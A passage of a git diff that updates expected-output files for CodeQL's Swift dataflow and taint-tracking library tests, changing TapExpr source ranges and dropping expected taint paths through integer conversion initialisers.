@@ -574,11 +558,11 @@ | stringinterpolation.swift:30:30:30:30 | | stringinterpolation.swift:30:30:30:30 | [post] $interpolation | | stringinterpolation.swift:30:30:30:30 | $interpolation | stringinterpolation.swift:30:30:30:30 | &... | | stringinterpolation.swift:30:30:30:30 | $interpolation | stringinterpolation.swift:30:30:30:30 | [post] $interpolation | -| stringinterpolation.swift:30:30:30:30 | &... | stringinterpolation.swift:30:12:30:12 | TapExpr | +| stringinterpolation.swift:30:30:30:30 | &... | stringinterpolation.swift:30:12:30:30 | TapExpr | | stringinterpolation.swift:30:30:30:30 | [post] $interpolation | stringinterpolation.swift:30:30:30:30 | &... | | stringinterpolation.swift:31:12:31:12 | SSA def($interpolation) | stringinterpolation.swift:31:13:31:13 | $interpolation | -| stringinterpolation.swift:31:12:31:12 | TapExpr | stringinterpolation.swift:31:12:31:12 | "..." | | stringinterpolation.swift:31:12:31:12 | pair: | stringinterpolation.swift:31:13:31:13 | [post] $interpolation | +| stringinterpolation.swift:31:12:31:31 | TapExpr | stringinterpolation.swift:31:12:31:12 | "..." | | stringinterpolation.swift:31:13:31:13 | $interpolation | stringinterpolation.swift:31:13:31:13 | &... | | stringinterpolation.swift:31:13:31:13 | $interpolation | stringinterpolation.swift:31:13:31:13 | [post] $interpolation | | stringinterpolation.swift:31:13:31:13 | &... | stringinterpolation.swift:31:20:31:20 | $interpolation | 
@@ -593,11 +577,11 @@ | stringinterpolation.swift:31:31:31:31 | | stringinterpolation.swift:31:31:31:31 | [post] $interpolation | | stringinterpolation.swift:31:31:31:31 | $interpolation | stringinterpolation.swift:31:31:31:31 | &... | | stringinterpolation.swift:31:31:31:31 | $interpolation | stringinterpolation.swift:31:31:31:31 | [post] $interpolation | -| stringinterpolation.swift:31:31:31:31 | &... | stringinterpolation.swift:31:12:31:12 | TapExpr | +| stringinterpolation.swift:31:31:31:31 | &... | stringinterpolation.swift:31:12:31:31 | TapExpr | | stringinterpolation.swift:31:31:31:31 | [post] $interpolation | stringinterpolation.swift:31:31:31:31 | &... | | stringinterpolation.swift:32:12:32:12 | SSA def($interpolation) | stringinterpolation.swift:32:13:32:13 | $interpolation | -| stringinterpolation.swift:32:12:32:12 | TapExpr | stringinterpolation.swift:32:12:32:12 | "..." | | stringinterpolation.swift:32:12:32:12 | pair: | stringinterpolation.swift:32:13:32:13 | [post] $interpolation | +| stringinterpolation.swift:32:12:32:24 | TapExpr | stringinterpolation.swift:32:12:32:12 | "..." | | stringinterpolation.swift:32:13:32:13 | $interpolation | stringinterpolation.swift:32:13:32:13 | &... | | stringinterpolation.swift:32:13:32:13 | $interpolation | stringinterpolation.swift:32:13:32:13 | [post] $interpolation | | stringinterpolation.swift:32:13:32:13 | &... | stringinterpolation.swift:32:20:32:20 | $interpolation | 
@@ -610,7 +594,7 @@ | stringinterpolation.swift:32:24:32:24 | | stringinterpolation.swift:32:24:32:24 | [post] $interpolation | | stringinterpolation.swift:32:24:32:24 | $interpolation | stringinterpolation.swift:32:24:32:24 | &... | | stringinterpolation.swift:32:24:32:24 | $interpolation | stringinterpolation.swift:32:24:32:24 | [post] $interpolation | -| stringinterpolation.swift:32:24:32:24 | &... | stringinterpolation.swift:32:12:32:12 | TapExpr | +| stringinterpolation.swift:32:24:32:24 | &... | stringinterpolation.swift:32:12:32:24 | TapExpr | | stringinterpolation.swift:32:24:32:24 | [post] $interpolation | stringinterpolation.swift:32:24:32:24 | &... | | stringinterpolation.swift:36:6:36:6 | SSA def(a) | stringinterpolation.swift:40:15:40:15 | a | | stringinterpolation.swift:36:6:36:6 | a | stringinterpolation.swift:36:6:36:6 | SSA def(a) | @@ -623,7 +607,7 @@ | stringinterpolation.swift:38:10:38:16 | call to clean() | stringinterpolation.swift:38:6:38:6 | c | | stringinterpolation.swift:40:12:40:12 | | stringinterpolation.swift:40:13:40:13 | [post] $interpolation | | stringinterpolation.swift:40:12:40:12 | SSA def($interpolation) | stringinterpolation.swift:40:13:40:13 | $interpolation | -| stringinterpolation.swift:40:12:40:12 | TapExpr | stringinterpolation.swift:40:12:40:12 | "..." | +| stringinterpolation.swift:40:12:40:26 | TapExpr | stringinterpolation.swift:40:12:40:12 | "..." | | stringinterpolation.swift:40:13:40:13 | $interpolation | stringinterpolation.swift:40:13:40:13 | &... | | stringinterpolation.swift:40:13:40:13 | $interpolation | stringinterpolation.swift:40:13:40:13 | [post] $interpolation | | stringinterpolation.swift:40:13:40:13 | &... | stringinterpolation.swift:40:14:40:14 | $interpolation | 
@@ -650,11 +634,11 @@ | stringinterpolation.swift:40:26:40:26 | | stringinterpolation.swift:40:26:40:26 | [post] $interpolation | | stringinterpolation.swift:40:26:40:26 | $interpolation | stringinterpolation.swift:40:26:40:26 | &... | | stringinterpolation.swift:40:26:40:26 | $interpolation | stringinterpolation.swift:40:26:40:26 | [post] $interpolation | -| stringinterpolation.swift:40:26:40:26 | &... | stringinterpolation.swift:40:12:40:12 | TapExpr | +| stringinterpolation.swift:40:26:40:26 | &... | stringinterpolation.swift:40:12:40:26 | TapExpr | | stringinterpolation.swift:40:26:40:26 | [post] $interpolation | stringinterpolation.swift:40:26:40:26 | &... | | stringinterpolation.swift:41:12:41:12 | | stringinterpolation.swift:41:13:41:13 | [post] $interpolation | | stringinterpolation.swift:41:12:41:12 | SSA def($interpolation) | stringinterpolation.swift:41:13:41:13 | $interpolation | -| stringinterpolation.swift:41:12:41:12 | TapExpr | stringinterpolation.swift:41:12:41:12 | "..." | +| stringinterpolation.swift:41:12:41:26 | TapExpr | stringinterpolation.swift:41:12:41:12 | "..." | | stringinterpolation.swift:41:13:41:13 | $interpolation | stringinterpolation.swift:41:13:41:13 | &... | | stringinterpolation.swift:41:13:41:13 | $interpolation | stringinterpolation.swift:41:13:41:13 | [post] $interpolation | | stringinterpolation.swift:41:13:41:13 | &... | stringinterpolation.swift:41:14:41:14 | $interpolation | 
@@ -681,11 +665,11 @@ | stringinterpolation.swift:41:26:41:26 | | stringinterpolation.swift:41:26:41:26 | [post] $interpolation | | stringinterpolation.swift:41:26:41:26 | $interpolation | stringinterpolation.swift:41:26:41:26 | &... | | stringinterpolation.swift:41:26:41:26 | $interpolation | stringinterpolation.swift:41:26:41:26 | [post] $interpolation | -| stringinterpolation.swift:41:26:41:26 | &... | stringinterpolation.swift:41:12:41:12 | TapExpr | +| stringinterpolation.swift:41:26:41:26 | &... | stringinterpolation.swift:41:12:41:26 | TapExpr | | stringinterpolation.swift:41:26:41:26 | [post] $interpolation | stringinterpolation.swift:41:26:41:26 | &... | | stringinterpolation.swift:42:12:42:12 | | stringinterpolation.swift:42:13:42:13 | [post] $interpolation | | stringinterpolation.swift:42:12:42:12 | SSA def($interpolation) | stringinterpolation.swift:42:13:42:13 | $interpolation | -| stringinterpolation.swift:42:12:42:12 | TapExpr | stringinterpolation.swift:42:12:42:12 | "..." | +| stringinterpolation.swift:42:12:42:26 | TapExpr | stringinterpolation.swift:42:12:42:12 | "..." | | stringinterpolation.swift:42:13:42:13 | $interpolation | stringinterpolation.swift:42:13:42:13 | &... | | stringinterpolation.swift:42:13:42:13 | $interpolation | stringinterpolation.swift:42:13:42:13 | [post] $interpolation | | stringinterpolation.swift:42:13:42:13 | &... | stringinterpolation.swift:42:14:42:14 | $interpolation | 
@@ -710,11 +694,11 @@ | stringinterpolation.swift:42:26:42:26 | | stringinterpolation.swift:42:26:42:26 | [post] $interpolation | | stringinterpolation.swift:42:26:42:26 | $interpolation | stringinterpolation.swift:42:26:42:26 | &... | | stringinterpolation.swift:42:26:42:26 | $interpolation | stringinterpolation.swift:42:26:42:26 | [post] $interpolation | -| stringinterpolation.swift:42:26:42:26 | &... | stringinterpolation.swift:42:12:42:12 | TapExpr | +| stringinterpolation.swift:42:26:42:26 | &... | stringinterpolation.swift:42:12:42:26 | TapExpr | | stringinterpolation.swift:42:26:42:26 | [post] $interpolation | stringinterpolation.swift:42:26:42:26 | &... | | stringinterpolation.swift:43:12:43:12 | | stringinterpolation.swift:43:13:43:13 | [post] $interpolation | | stringinterpolation.swift:43:12:43:12 | SSA def($interpolation) | stringinterpolation.swift:43:13:43:13 | $interpolation | -| stringinterpolation.swift:43:12:43:12 | TapExpr | stringinterpolation.swift:43:12:43:12 | "..." | +| stringinterpolation.swift:43:12:43:26 | TapExpr | stringinterpolation.swift:43:12:43:12 | "..." | | stringinterpolation.swift:43:13:43:13 | $interpolation | stringinterpolation.swift:43:13:43:13 | &... | | stringinterpolation.swift:43:13:43:13 | $interpolation | stringinterpolation.swift:43:13:43:13 | [post] $interpolation | | stringinterpolation.swift:43:13:43:13 | &... | stringinterpolation.swift:43:14:43:14 | $interpolation | 
@@ -739,11 +723,11 @@ | stringinterpolation.swift:43:26:43:26 | | stringinterpolation.swift:43:26:43:26 | [post] $interpolation | | stringinterpolation.swift:43:26:43:26 | $interpolation | stringinterpolation.swift:43:26:43:26 | &... | | stringinterpolation.swift:43:26:43:26 | $interpolation | stringinterpolation.swift:43:26:43:26 | [post] $interpolation | -| stringinterpolation.swift:43:26:43:26 | &... | stringinterpolation.swift:43:12:43:12 | TapExpr | +| stringinterpolation.swift:43:26:43:26 | &... | stringinterpolation.swift:43:12:43:26 | TapExpr | | stringinterpolation.swift:43:26:43:26 | [post] $interpolation | stringinterpolation.swift:43:26:43:26 | &... | | stringinterpolation.swift:44:12:44:12 | | stringinterpolation.swift:44:13:44:13 | [post] $interpolation | | stringinterpolation.swift:44:12:44:12 | SSA def($interpolation) | stringinterpolation.swift:44:13:44:13 | $interpolation | -| stringinterpolation.swift:44:12:44:12 | TapExpr | stringinterpolation.swift:44:12:44:12 | "..." | +| stringinterpolation.swift:44:12:44:26 | TapExpr | stringinterpolation.swift:44:12:44:12 | "..." | | stringinterpolation.swift:44:13:44:13 | $interpolation | stringinterpolation.swift:44:13:44:13 | &... | | stringinterpolation.swift:44:13:44:13 | $interpolation | stringinterpolation.swift:44:13:44:13 | [post] $interpolation | | stringinterpolation.swift:44:13:44:13 | &... | stringinterpolation.swift:44:14:44:14 | $interpolation | 
@@ -768,7 +752,7 @@ | stringinterpolation.swift:44:26:44:26 | | stringinterpolation.swift:44:26:44:26 | [post] $interpolation | | stringinterpolation.swift:44:26:44:26 | $interpolation | stringinterpolation.swift:44:26:44:26 | &... | | stringinterpolation.swift:44:26:44:26 | $interpolation | stringinterpolation.swift:44:26:44:26 | [post] $interpolation | -| stringinterpolation.swift:44:26:44:26 | &... | stringinterpolation.swift:44:12:44:12 | TapExpr | +| stringinterpolation.swift:44:26:44:26 | &... | stringinterpolation.swift:44:12:44:26 | TapExpr | | stringinterpolation.swift:44:26:44:26 | [post] $interpolation | stringinterpolation.swift:44:26:44:26 | &... | | subscript.swift:1:7:1:7 | SSA def(self) | subscript.swift:1:7:1:7 | self[return] | | subscript.swift:1:7:1:7 | SSA def(self) | subscript.swift:1:7:1:7 | self[return] | diff --git a/swift/ql/test/library-tests/dataflow/taint/core/Taint.expected b/swift/ql/test/library-tests/dataflow/taint/core/Taint.expected index 70cf2d3eaf0..104e2baa545 100644 --- a/swift/ql/test/library-tests/dataflow/taint/core/Taint.expected +++ b/swift/ql/test/library-tests/dataflow/taint/core/Taint.expected @@ -1,6 +1,4 @@ edges -| conversions.swift:33:16:33:26 | call to sourceInt() | conversions.swift:33:12:33:27 | call to Self.init(_:) | provenance | | -| conversions.swift:34:18:34:28 | call to sourceInt() | conversions.swift:34:12:34:29 | call to Self.init(_:) | provenance | | | conversions.swift:35:18:35:28 | call to sourceInt() | conversions.swift:35:12:35:29 | call to Float.init(_:) | provenance | | | conversions.swift:36:19:36:29 | call to sourceInt() | conversions.swift:36:12:36:30 | call to String.init(_:) | provenance | | | conversions.swift:37:12:37:30 | call to String.init(_:) | conversions.swift:37:12:37:32 | .utf8 | provenance | | 
@@ -24,19 +22,8 @@ edges | conversions.swift:51:30:51:40 | call to sourceInt() | conversions.swift:51:18:51:41 | call to numericCast(_:) | provenance | | | conversions.swift:54:17:54:57 | call to unsafeBitCast(_:to:) | conversions.swift:55:12:55:12 | v4 | provenance | | | conversions.swift:54:31:54:41 | call to sourceInt() | conversions.swift:54:17:54:57 | call to unsafeBitCast(_:to:) | provenance | | -| conversions.swift:57:11:57:47 | call to Self.init(truncatingIfNeeded:) | conversions.swift:58:12:58:12 | v5 | provenance | | -| conversions.swift:57:36:57:46 | call to sourceInt() | conversions.swift:57:11:57:47 | call to Self.init(truncatingIfNeeded:) | provenance | | -| conversions.swift:60:11:60:39 | call to UInt.init(bitPattern:) | conversions.swift:61:12:61:12 | v6 | provenance | | -| conversions.swift:60:28:60:38 | call to sourceInt() | conversions.swift:60:11:60:39 | call to UInt.init(bitPattern:) | provenance | | | conversions.swift:63:11:63:26 | call to abs(_:) | conversions.swift:64:12:64:12 | v7 | provenance | | | conversions.swift:63:15:63:25 | call to sourceInt() | conversions.swift:63:11:63:26 | call to abs(_:) | provenance | | -| conversions.swift:69:28:69:38 | call to sourceInt() | conversions.swift:69:12:69:39 | call to advanced(by:) | provenance | | -| conversions.swift:71:12:71:36 | call to Self.init(exactly:) [some:0] | conversions.swift:71:12:71:37 | ...! | provenance | | -| conversions.swift:71:25:71:35 | call to sourceInt() | conversions.swift:71:12:71:36 | call to Self.init(exactly:) [some:0] | provenance | | -| conversions.swift:72:12:72:39 | call to Self.init(exactly:) [some:0] | conversions.swift:72:12:72:40 | ...! 
| provenance | | -| conversions.swift:72:28:72:38 | call to sourceInt() | conversions.swift:72:12:72:39 | call to Self.init(exactly:) [some:0] | provenance | | -| conversions.swift:73:26:73:36 | call to sourceInt() | conversions.swift:73:12:73:37 | call to Self.init(clamping:) | provenance | | -| conversions.swift:74:36:74:46 | call to sourceInt() | conversions.swift:74:12:74:47 | call to Self.init(truncatingIfNeeded:) | provenance | | | conversions.swift:75:12:75:41 | call to Self.init(_:radix:) [some:0] | conversions.swift:75:12:75:42 | ...! | provenance | | | conversions.swift:75:16:75:29 | call to sourceString() | conversions.swift:75:12:75:41 | call to Self.init(_:radix:) [some:0] | provenance | | | conversions.swift:77:30:77:40 | call to sourceInt() | conversions.swift:77:12:77:41 | call to Self.init(littleEndian:) | provenance | | @@ -44,7 +31,6 @@ edges | conversions.swift:79:12:79:22 | call to sourceInt() | conversions.swift:79:12:79:24 | .littleEndian | provenance | | | conversions.swift:80:12:80:22 | call to sourceInt() | conversions.swift:80:12:80:24 | .bigEndian | provenance | | | conversions.swift:109:18:109:30 | call to sourceFloat() | conversions.swift:109:12:109:31 | call to Float.init(_:) | provenance | | -| conversions.swift:110:18:110:30 | call to sourceFloat() | conversions.swift:110:12:110:31 | call to UInt8.init(_:) | provenance | | | conversions.swift:111:19:111:31 | call to sourceFloat() | conversions.swift:111:12:111:32 | call to String.init(_:) | provenance | | | conversions.swift:112:12:112:32 | call to String.init(_:) | conversions.swift:112:12:112:34 | .utf8 | provenance | | | conversions.swift:112:19:112:31 | call to sourceFloat() | conversions.swift:112:12:112:32 | call to String.init(_:) | provenance | | 
@@ -64,8 +50,6 @@ edges | conversions.swift:127:12:127:26 | call to sourceFloat80() | conversions.swift:127:12:127:28 | .significand | provenance | | | conversions.swift:128:12:128:25 | call to sourceDouble() | conversions.swift:128:12:128:27 | .exponent | provenance | | | conversions.swift:129:12:129:25 | call to sourceDouble() | conversions.swift:129:12:129:27 | .significand | provenance | | -| conversions.swift:130:12:130:23 | call to sourceUInt() | conversions.swift:130:12:130:25 | .byteSwapped | provenance | | -| conversions.swift:131:12:131:25 | call to sourceUInt64() | conversions.swift:131:12:131:27 | .byteSwapped | provenance | | | conversions.swift:136:19:136:32 | call to sourceString() | conversions.swift:136:12:136:33 | call to String.init(_:) | provenance | | | conversions.swift:144:12:144:35 | call to MyString.init(_:) | conversions.swift:144:12:144:35 | call to MyString.init(_:) [some:0] | provenance | | | conversions.swift:144:12:144:35 | call to MyString.init(_:) | conversions.swift:145:12:145:12 | ms2 | provenance | | @@ -82,7 +66,6 @@ edges | conversions.swift:156:25:156:69 | call to unsafeDowncast(_:to:) | conversions.swift:157:12:157:12 | v3 | provenance | | | conversions.swift:156:25:156:69 | call to unsafeDowncast(_:to:) | conversions.swift:158:12:158:12 | v3 | provenance | | | conversions.swift:156:40:156:40 | parent | conversions.swift:156:25:156:69 | call to unsafeDowncast(_:to:) | provenance | | -| conversions.swift:166:24:166:34 | call to sourceInt() | conversions.swift:166:12:166:35 | call to Self.init(_:) | provenance | | | conversions.swift:171:14:171:33 | call to sourceArray(_:) | conversions.swift:173:13:173:13 | arr1 | provenance | | | conversions.swift:171:14:171:33 | call to sourceArray(_:) | conversions.swift:175:13:175:19 | ...[...] | provenance | | | conversions.swift:171:14:171:33 | call to sourceArray(_:) | conversions.swift:178:25:178:25 | arr1 | provenance | | 
@@ -114,10 +97,6 @@ edges | conversions.swift:200:3:200:3 | [post] self [v] | conversions.swift:199:2:201:2 | self[return] [v] | provenance | | | conversions.swift:200:12:200:12 | v | conversions.swift:200:3:200:3 | [post] self [v] | provenance | | | conversions.swift:205:7:205:17 | withUInt | conversions.swift:206:13:206:13 | withUInt | provenance | | -| conversions.swift:205:7:205:17 | withUInt | conversions.swift:207:14:207:14 | withUInt | provenance | | -| conversions.swift:207:10:207:22 | call to Self.init(_:) | conversions.swift:205:2:209:2 | self[return] | provenance | | -| conversions.swift:207:10:207:22 | call to Self.init(_:) | conversions.swift:208:12:208:12 | self | provenance | | -| conversions.swift:207:14:207:14 | withUInt | conversions.swift:207:10:207:22 | call to Self.init(_:) | provenance | | | conversions.swift:211:7:211:20 | withMyValue [v] | conversions.swift:212:13:212:13 | withMyValue [v] | provenance | | | conversions.swift:212:13:212:13 | withMyValue [v] | conversions.swift:197:6:197:6 | self [v] | provenance | | | conversions.swift:212:13:212:13 | withMyValue [v] | conversions.swift:212:13:212:25 | .v | provenance | | 
@@ -136,7 +115,6 @@ edges | conversions.swift:226:10:226:10 | withMyValue [v] | conversions.swift:197:6:197:6 | self [v] | provenance | | | conversions.swift:226:10:226:10 | withMyValue [v] | conversions.swift:226:10:226:22 | .v | provenance | | | conversions.swift:232:26:232:37 | call to sourceUInt() | conversions.swift:205:7:205:17 | withUInt | provenance | | -| conversions.swift:232:26:232:37 | call to sourceUInt() | conversions.swift:232:12:232:38 | call to Int.init(withUInt:) | provenance | | | conversions.swift:235:29:235:48 | call to MyValue.init(_:) [v] | conversions.swift:211:7:211:20 | withMyValue [v] | provenance | | | conversions.swift:235:37:235:47 | call to sourceInt() | conversions.swift:199:7:199:12 | v | provenance | | | conversions.swift:235:37:235:47 | call to sourceInt() | conversions.swift:235:29:235:48 | call to MyValue.init(_:) [v] | provenance | | @@ -232,10 +210,6 @@ edges | try.swift:18:18:18:25 | call to source() [some:0] | try.swift:18:13:18:25 | try? ... [some:0] | provenance | | nodes | conversions.swift:32:12:32:22 | call to sourceInt() | semmle.label | call to sourceInt() | -| conversions.swift:33:12:33:27 | call to Self.init(_:) | semmle.label | call to Self.init(_:) | -| conversions.swift:33:16:33:26 | call to sourceInt() | semmle.label | call to sourceInt() | -| conversions.swift:34:12:34:29 | call to Self.init(_:) | semmle.label | call to Self.init(_:) | -| conversions.swift:34:18:34:28 | call to sourceInt() | semmle.label | call to sourceInt() | | conversions.swift:35:12:35:29 | call to Float.init(_:) | semmle.label | call to Float.init(_:) | | conversions.swift:35:18:35:28 | call to sourceInt() | semmle.label | call to sourceInt() | | conversions.swift:36:12:36:30 | call to String.init(_:) | semmle.label | call to String.init(_:) | 
@@ -268,27 +242,9 @@ nodes | conversions.swift:54:17:54:57 | call to unsafeBitCast(_:to:) | semmle.label | call to unsafeBitCast(_:to:) | | conversions.swift:54:31:54:41 | call to sourceInt() | semmle.label | call to sourceInt() | | conversions.swift:55:12:55:12 | v4 | semmle.label | v4 | -| conversions.swift:57:11:57:47 | call to Self.init(truncatingIfNeeded:) | semmle.label | call to Self.init(truncatingIfNeeded:) | -| conversions.swift:57:36:57:46 | call to sourceInt() | semmle.label | call to sourceInt() | -| conversions.swift:58:12:58:12 | v5 | semmle.label | v5 | -| conversions.swift:60:11:60:39 | call to UInt.init(bitPattern:) | semmle.label | call to UInt.init(bitPattern:) | -| conversions.swift:60:28:60:38 | call to sourceInt() | semmle.label | call to sourceInt() | -| conversions.swift:61:12:61:12 | v6 | semmle.label | v6 | | conversions.swift:63:11:63:26 | call to abs(_:) | semmle.label | call to abs(_:) | | conversions.swift:63:15:63:25 | call to sourceInt() | semmle.label | call to sourceInt() | | conversions.swift:64:12:64:12 | v7 | semmle.label | v7 | -| conversions.swift:69:12:69:39 | call to advanced(by:) | semmle.label | call to advanced(by:) | -| conversions.swift:69:28:69:38 | call to sourceInt() | semmle.label | call to sourceInt() | -| conversions.swift:71:12:71:36 | call to Self.init(exactly:) [some:0] | semmle.label | call to Self.init(exactly:) [some:0] | -| conversions.swift:71:12:71:37 | ...! | semmle.label | ...! | -| conversions.swift:71:25:71:35 | call to sourceInt() | semmle.label | call to sourceInt() | -| conversions.swift:72:12:72:39 | call to Self.init(exactly:) [some:0] | semmle.label | call to Self.init(exactly:) [some:0] | -| conversions.swift:72:12:72:40 | ...! | semmle.label | ...! 
| -| conversions.swift:72:28:72:38 | call to sourceInt() | semmle.label | call to sourceInt() | -| conversions.swift:73:12:73:37 | call to Self.init(clamping:) | semmle.label | call to Self.init(clamping:) | -| conversions.swift:73:26:73:36 | call to sourceInt() | semmle.label | call to sourceInt() | -| conversions.swift:74:12:74:47 | call to Self.init(truncatingIfNeeded:) | semmle.label | call to Self.init(truncatingIfNeeded:) | -| conversions.swift:74:36:74:46 | call to sourceInt() | semmle.label | call to sourceInt() | | conversions.swift:75:12:75:41 | call to Self.init(_:radix:) [some:0] | semmle.label | call to Self.init(_:radix:) [some:0] | | conversions.swift:75:12:75:42 | ...! | semmle.label | ...! | | conversions.swift:75:16:75:29 | call to sourceString() | semmle.label | call to sourceString() | @@ -303,8 +259,6 @@ nodes | conversions.swift:108:12:108:24 | call to sourceFloat() | semmle.label | call to sourceFloat() | | conversions.swift:109:12:109:31 | call to Float.init(_:) | semmle.label | call to Float.init(_:) | | conversions.swift:109:18:109:30 | call to sourceFloat() | semmle.label | call to sourceFloat() | -| conversions.swift:110:12:110:31 | call to UInt8.init(_:) | semmle.label | call to UInt8.init(_:) | -| conversions.swift:110:18:110:30 | call to sourceFloat() | semmle.label | call to sourceFloat() | | conversions.swift:111:12:111:32 | call to String.init(_:) | semmle.label | call to String.init(_:) | | conversions.swift:111:19:111:31 | call to sourceFloat() | semmle.label | call to sourceFloat() | | conversions.swift:112:12:112:32 | call to String.init(_:) | semmle.label | call to String.init(_:) | 
@@ -340,10 +294,6 @@ nodes | conversions.swift:128:12:128:27 | .exponent | semmle.label | .exponent | | conversions.swift:129:12:129:25 | call to sourceDouble() | semmle.label | call to sourceDouble() | | conversions.swift:129:12:129:27 | .significand | semmle.label | .significand | -| conversions.swift:130:12:130:23 | call to sourceUInt() | semmle.label | call to sourceUInt() | -| conversions.swift:130:12:130:25 | .byteSwapped | semmle.label | .byteSwapped | -| conversions.swift:131:12:131:25 | call to sourceUInt64() | semmle.label | call to sourceUInt64() | -| conversions.swift:131:12:131:27 | .byteSwapped | semmle.label | .byteSwapped | | conversions.swift:135:12:135:25 | call to sourceString() | semmle.label | call to sourceString() | | conversions.swift:136:12:136:33 | call to String.init(_:) | semmle.label | call to String.init(_:) | | conversions.swift:136:19:136:32 | call to sourceString() | semmle.label | call to sourceString() | @@ -361,8 +311,6 @@ nodes | conversions.swift:156:40:156:40 | parent | semmle.label | parent | | conversions.swift:157:12:157:12 | v3 | semmle.label | v3 | | conversions.swift:158:12:158:12 | v3 | semmle.label | v3 | -| conversions.swift:166:12:166:35 | call to Self.init(_:) | semmle.label | call to Self.init(_:) | -| conversions.swift:166:24:166:34 | call to sourceInt() | semmle.label | call to sourceInt() | | conversions.swift:171:14:171:33 | call to sourceArray(_:) | semmle.label | call to sourceArray(_:) | | conversions.swift:172:14:172:26 | [...] [Collection element] | semmle.label | [...] [Collection element] | | conversions.swift:172:15:172:25 | call to sourceInt() | semmle.label | call to sourceInt() | 
@@ -396,12 +344,8 @@ nodes | conversions.swift:199:7:199:12 | v | semmle.label | v | | conversions.swift:200:3:200:3 | [post] self [v] | semmle.label | [post] self [v] | | conversions.swift:200:12:200:12 | v | semmle.label | v | -| conversions.swift:205:2:209:2 | self[return] | semmle.label | self[return] | | conversions.swift:205:7:205:17 | withUInt | semmle.label | withUInt | | conversions.swift:206:13:206:13 | withUInt | semmle.label | withUInt | -| conversions.swift:207:10:207:22 | call to Self.init(_:) | semmle.label | call to Self.init(_:) | -| conversions.swift:207:14:207:14 | withUInt | semmle.label | withUInt | -| conversions.swift:208:12:208:12 | self | semmle.label | self | | conversions.swift:211:7:211:20 | withMyValue [v] | semmle.label | withMyValue [v] | | conversions.swift:212:13:212:13 | withMyValue [v] | semmle.label | withMyValue [v] | | conversions.swift:212:13:212:25 | .v | semmle.label | .v | @@ -417,7 +361,6 @@ nodes | conversions.swift:225:13:225:25 | .v | semmle.label | .v | | conversions.swift:226:10:226:10 | withMyValue [v] | semmle.label | withMyValue [v] | | conversions.swift:226:10:226:22 | .v | semmle.label | .v | -| conversions.swift:232:12:232:38 | call to Int.init(withUInt:) | semmle.label | call to Int.init(withUInt:) | | conversions.swift:232:26:232:37 | call to sourceUInt() | semmle.label | call to sourceUInt() | | conversions.swift:235:29:235:48 | call to MyValue.init(_:) [v] | semmle.label | call to MyValue.init(_:) [v] | | conversions.swift:235:37:235:47 | call to sourceInt() | semmle.label | call to sourceInt() | 
@@ -557,7 +500,6 @@ subpaths | conversions.swift:219:11:219:11 | withMyValue2 [v] | conversions.swift:197:6:197:6 | self [v] | file://:0:0:0:0 | .v | conversions.swift:219:11:219:24 | .v | | conversions.swift:225:13:225:13 | withMyValue [v] | conversions.swift:197:6:197:6 | self [v] | file://:0:0:0:0 | .v | conversions.swift:225:13:225:25 | .v | | conversions.swift:226:10:226:10 | withMyValue [v] | conversions.swift:197:6:197:6 | self [v] | file://:0:0:0:0 | .v | conversions.swift:226:10:226:22 | .v | -| conversions.swift:232:26:232:37 | call to sourceUInt() | conversions.swift:205:7:205:17 | withUInt | conversions.swift:205:2:209:2 | self[return] | conversions.swift:232:12:232:38 | call to Int.init(withUInt:) | | conversions.swift:235:37:235:47 | call to sourceInt() | conversions.swift:199:7:199:12 | v | conversions.swift:199:2:201:2 | self[return] [v] | conversions.swift:235:29:235:48 | call to MyValue.init(_:) [v] | | conversions.swift:238:30:238:49 | call to MyValue.init(_:) [v] | conversions.swift:217:7:217:21 | withMyValue2 [v] | conversions.swift:217:2:222:2 | self[return] | conversions.swift:238:12:238:50 | call to Int.init(withMyValue2:) | | conversions.swift:238:38:238:48 | call to sourceInt() | conversions.swift:199:7:199:12 | v | conversions.swift:199:2:201:2 | self[return] [v] | conversions.swift:238:30:238:49 | call to MyValue.init(_:) [v] | 
@@ -572,8 +514,6 @@ subpaths | stringinterpolation.swift:31:21:31:21 | p2 [second] | stringinterpolation.swift:7:6:7:6 | self [second] | file://:0:0:0:0 | .second | stringinterpolation.swift:31:21:31:24 | .second | #select | conversions.swift:32:12:32:22 | call to sourceInt() | conversions.swift:32:12:32:22 | call to sourceInt() | conversions.swift:32:12:32:22 | call to sourceInt() | result | -| conversions.swift:33:12:33:27 | call to Self.init(_:) | conversions.swift:33:16:33:26 | call to sourceInt() | conversions.swift:33:12:33:27 | call to Self.init(_:) | result | -| conversions.swift:34:12:34:29 | call to Self.init(_:) | conversions.swift:34:18:34:28 | call to sourceInt() | conversions.swift:34:12:34:29 | call to Self.init(_:) | result | | conversions.swift:35:12:35:29 | call to Float.init(_:) | conversions.swift:35:18:35:28 | call to sourceInt() | conversions.swift:35:12:35:29 | call to Float.init(_:) | result | | conversions.swift:36:12:36:30 | call to String.init(_:) | conversions.swift:36:19:36:29 | call to sourceInt() | conversions.swift:36:12:36:30 | call to String.init(_:) | result | | conversions.swift:37:12:37:32 | .utf8 | conversions.swift:37:19:37:29 | call to sourceInt() | conversions.swift:37:12:37:32 | .utf8 | result | 
@@ -586,14 +526,7 @@ subpaths | conversions.swift:48:13:48:13 | v | conversions.swift:47:13:47:23 | call to sourceInt() | conversions.swift:48:13:48:13 | v | result | | conversions.swift:52:12:52:12 | v2 | conversions.swift:51:30:51:40 | call to sourceInt() | conversions.swift:52:12:52:12 | v2 | result | | conversions.swift:55:12:55:12 | v4 | conversions.swift:54:31:54:41 | call to sourceInt() | conversions.swift:55:12:55:12 | v4 | result | -| conversions.swift:58:12:58:12 | v5 | conversions.swift:57:36:57:46 | call to sourceInt() | conversions.swift:58:12:58:12 | v5 | result | -| conversions.swift:61:12:61:12 | v6 | conversions.swift:60:28:60:38 | call to sourceInt() | conversions.swift:61:12:61:12 | v6 | result | | conversions.swift:64:12:64:12 | v7 | conversions.swift:63:15:63:25 | call to sourceInt() | conversions.swift:64:12:64:12 | v7 | result | -| conversions.swift:69:12:69:39 | call to advanced(by:) | conversions.swift:69:28:69:38 | call to sourceInt() | conversions.swift:69:12:69:39 | call to advanced(by:) | result | -| conversions.swift:71:12:71:37 | ...! | conversions.swift:71:25:71:35 | call to sourceInt() | conversions.swift:71:12:71:37 | ...! | result | -| conversions.swift:72:12:72:40 | ...! | conversions.swift:72:28:72:38 | call to sourceInt() | conversions.swift:72:12:72:40 | ...! | result | -| conversions.swift:73:12:73:37 | call to Self.init(clamping:) | conversions.swift:73:26:73:36 | call to sourceInt() | conversions.swift:73:12:73:37 | call to Self.init(clamping:) | result | -| conversions.swift:74:12:74:47 | call to Self.init(truncatingIfNeeded:) | conversions.swift:74:36:74:46 | call to sourceInt() | conversions.swift:74:12:74:47 | call to 